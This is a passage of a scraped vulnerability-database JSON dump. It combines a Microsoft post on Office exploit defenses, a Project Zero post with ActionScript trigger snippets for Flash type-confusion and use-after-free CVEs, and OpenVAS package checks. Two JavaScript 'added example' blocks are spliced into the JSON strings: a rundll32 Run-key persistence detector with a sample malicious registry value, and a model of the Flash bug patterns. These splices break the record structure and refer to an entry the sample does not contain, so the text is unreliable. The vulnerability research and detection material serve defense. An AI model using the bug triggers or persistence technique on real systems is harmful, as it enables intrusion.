Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. 
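As an added example, not code from the Microsoft post, the following JavaScript scans `reg query` style output for the rundll32-based Run-key persistence described above and reports why each autostart entry deserves attention. The OneDrive and SecurityHealth entries, the user name and the random value name are constructed for the sample; the rundll32 command line is the one quoted above. It runs as-is under Node.

```javascript
// Added example, not code from the Microsoft post: a detector for the
// rundll32 Run-key persistence described above, run over constructed
// "reg query" output. Value name, user name and the OneDrive/SecurityHealth
// entries are made up; the rundll32 command line is the one quoted in the post.

const RUNDLL32 = /(?:^|\\)rundll32(?:\.exe)?$/i;
// Locations an unprivileged user can write to. Plenty of legitimate software
// autostarts from AppData, so that alone is a weak signal; rundll32 loading a
// DLL by export name from such a directory is the strong one.
const USER_WRITABLE = [/\\programdata\\/i, /\\users\\[^\\]+\\appdata\\/i, /\\temp\\/i];

// One "reg query" data line -> { name, type, data }, or null for headers/blank lines.
function parseRegLine(line) {
  const m = /^\s+(\S+)\s+(REG_SZ|REG_EXPAND_SZ)\s+(.*)$/.exec(line);
  return m ? { name: m[1], type: m[2], data: m[3].trim() } : null;
}

// Split a command line into argv, honouring double quotes around paths with spaces.
function splitCommand(data) {
  return (data.match(/"[^"]*"|\S+/g) || []).map(p => p.replace(/^"|"$/g, ""));
}

function analyseRunValue(entry) {
  const argv = splitCommand(entry.data);
  if (argv.length === 0) return null;
  const exe = argv[0];
  if (RUNDLL32.test(exe) && argv.length >= 2) {
    // Accepts both "rundll32 x.dll,Export" and "rundll32 x.dll, Export".
    const [dll, exportInline = ""] = argv[1].split(",");
    const exportName = exportInline || argv[2] || "";
    const writable = USER_WRITABLE.some(rx => rx.test(dll));
    return {
      name: entry.name, severity: writable ? "high" : "medium", dll, exportName,
      reason: `rundll32 loads ${dll} and calls export ${exportName || "(none)"}` +
              (writable ? " from a user-writable directory" : ""),
    };
  }
  if (USER_WRITABLE.some(rx => rx.test(exe))) {
    return { name: entry.name, severity: "low", dll: null, exportName: null,
             reason: `autostart executable ${exe} lives in a user-writable directory` };
  }
  return null;
}

function scanRegQueryOutput(text) {
  return text.split(/\r?\n/).map(parseRegLine).filter(Boolean)
             .map(analyseRunValue).filter(Boolean);
}

// Constructed sample in the format of `reg query HKCU\...\Run`.
const SAMPLE = String.raw`
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    7f3a9c1e    REG_SZ    C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN
`;

for (const f of scanRegQueryOutput(SAMPLE)) console.log(`[${f.severity}] ${f.name}: ${f.reason}`);
```

The severity split is deliberate: OneDrive is reported as low because it genuinely lives under AppData, while the Wingbird entry is high because rundll32 is being pointed at a DLL under %ProgramData% with an explicit export, which is exactly the shape of the value quoted above.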
Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAt Microsoft, we don't stop working to protect our customers' mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. 
Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "edition": 2, "cvss3": {}, "published": "2017-11-21T13:46:01", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:16", "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. 
Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n<script>\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\"hello\");\n\n</script>\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. 
Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below.\n\n \n\n\n# How to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator (that is, plain assignment with =) is the simplest way to redefine an object or function, and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. 
In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to be wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters property is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. 
This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes the object as a BitmapData. When the constructor is called, the object's type is set to FileReference, even though that is not the type that is returned. This leads to an object whose AS object type and native object type are inconsistent, and therefore to type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which allows behaviour that isn\u2019t possible when simply setting a property, such as returning a different value each time a property is accessed. 
ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value->nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. 
Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where a call to a conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k < 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix setter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the provided array, it calls valueOf to convert each element to a Number. However, if the valueOf function itself assigns matrix again, the setter is re-entered: it deletes and reallocates the matrix array even though the outer call isn\u2019t complete, and the outer call then writes to the freed allocation after the inner call returns. This leads to a use-after-free bug. \n\n \n\n\n## CVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leak, which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter, unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. 
The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. 
This leads to type confusion when the variable is used, since it is assumed to be an ActionScript object and used as a pointer rather than as a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the uri property of a NetConnection object, and when the native code attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it fires after type checking; otherwise the function would fail to execute if called on a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype property.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods that are called, as a last resort, when resolution of a property or method fails. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. 
In JavaScript, there are a series of __lookup*__ methods, such as __lookupGetter__, which serve the same purpose (which method gets called depends on what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out which properties of the object the method is accessing, and those properties can then be modified further.\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "edition": 2, "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:38:51", "description": "The remote host is missing an update for the ", "cvss3": {}, 
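As an added example, not code from the Project Zero post, the following plain JavaScript models the two native-code assumptions broken in the Conversion Operators section (the CVE-2015-5119 pattern) and the Proxy Objects section (the CVE-2015-0327 pattern). NativeByteArray and the growing Proxy are constructed stand-ins for the AVM objects, so the stale-buffer write and the count-then-fill overflow can be observed under Node without a Flash VM; the hardened variants show the ordering that removes each bug.

```javascript
// Added example, not code from the Project Zero post: a plain-JavaScript model
// of two native-code assumptions the post describes. NativeByteArray and the
// growing Proxy are constructed stand-ins for the engine objects named in the post.

// --- 1. Conversion-operator reentrancy (the shape of CVE-2015-5119) ---
// A "native" byte array whose backing store is reallocated when length changes,
// like ByteArray.length in the AVM.
class NativeByteArray {
  constructor(len) { this.buf = new Uint8Array(len); }
  get length() { return this.buf.length; }
  set length(n) {
    const fresh = new Uint8Array(n);
    fresh.set(this.buf.subarray(0, Math.min(n, this.buf.length)));
    this.buf = fresh;                          // the old store is now stale
  }
  // Vulnerable order: capture the backing store, then convert the value.
  // Number(value) runs a script-defined valueOf, which may reallocate; the
  // write then lands in the stale store. In native code that is a use-after-free.
  setUintVulnerable(i, value) {
    if (i >= this.length) throw new RangeError("index out of range");
    const store = this.buf;
    store[i] = Number(value) & 0xff;           // valueOf runs during this statement
    return store !== this.buf;                 // true: the write hit the stale store
  }
  // Hardened order: finish every script-visible conversion first, then re-check
  // bounds and write through the current store.
  setUintHardened(i, value) {
    const v = Number(value) & 0xff;            // valueOf runs here, before any native state is captured
    if (i >= this.length) throw new RangeError("index out of range");
    this.buf[i] = v;
    return false;
  }
}

function demoValueOfReentrancy(hardened) {
  const b = new NativeByteArray(12);
  // Same trick as the leaked exploit: valueOf grows the array mid-write.
  const trigger = { valueOf() { b.length = 1000; return 0x41; } };
  const stale = hardened ? b.setUintHardened(0, trigger) : b.setUintVulnerable(0, trigger);
  return { stale, lengthAfter: b.length, byte0: b.buf[0] };
}

// --- 2. Proxy enumeration that differs between passes (the shape of CVE-2015-0327) ---
// ownKeys answers with more keys on every call.
function makeGrowingProxy() {
  let calls = 0;
  return new Proxy({}, {
    ownKeys() { calls++; return Array.from({ length: calls * 2 }, (_, i) => "k" + i); },
  });
}

// Vulnerable: size a fixed buffer from one enumeration, fill it from a second.
function collectNamesVulnerable(obj) {
  const count = Reflect.ownKeys(obj).length;      // pass 1 answers 2 keys
  const names = new Array(count).fill(null);      // fixed-size "allocation"
  let written = 0, overflow = 0;
  for (const name of Reflect.ownKeys(obj)) {      // pass 2 answers 4 keys
    if (written < names.length) names[written] = name;
    else overflow++;                              // native code would write past the end here
    written++;
  }
  return { allocated: count, written, overflow };
}

// Hardened: enumerate once, then size and fill from that single snapshot.
function collectNamesHardened(obj) {
  const snapshot = Reflect.ownKeys(obj);
  const names = snapshot.slice();
  return { allocated: names.length, written: names.length, overflow: 0 };
}

console.log("valueOf, vulnerable:", demoValueOfReentrancy(false));
console.log("valueOf, hardened:  ", demoValueOfReentrancy(true));
console.log("proxy, vulnerable:  ", collectNamesVulnerable(makeGrowingProxy()));
console.log("proxy, hardened:    ", collectNamesHardened(makeGrowingProxy()));
```

In the vulnerable byte-array case the 0x41 never reaches the live buffer (byte0 stays 0) because the assignment targets the store captured before valueOf ran; in the vulnerable Proxy case the second enumeration yields twice as many names as the buffer was sized for. Both hardened variants apply the same rule the post's conclusion implies: let all script-visible hooks run before native code captures any pointer or size derived from the object.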
"published": "2015-10-15T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850845", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850845\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:12:54 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\",\n \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\",\n \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\",\n \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\",\n \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\",\n \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\",\n \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\",\n \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\",\n \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: 
Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1211-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", 
rpm:\"flash-player~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:24", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# 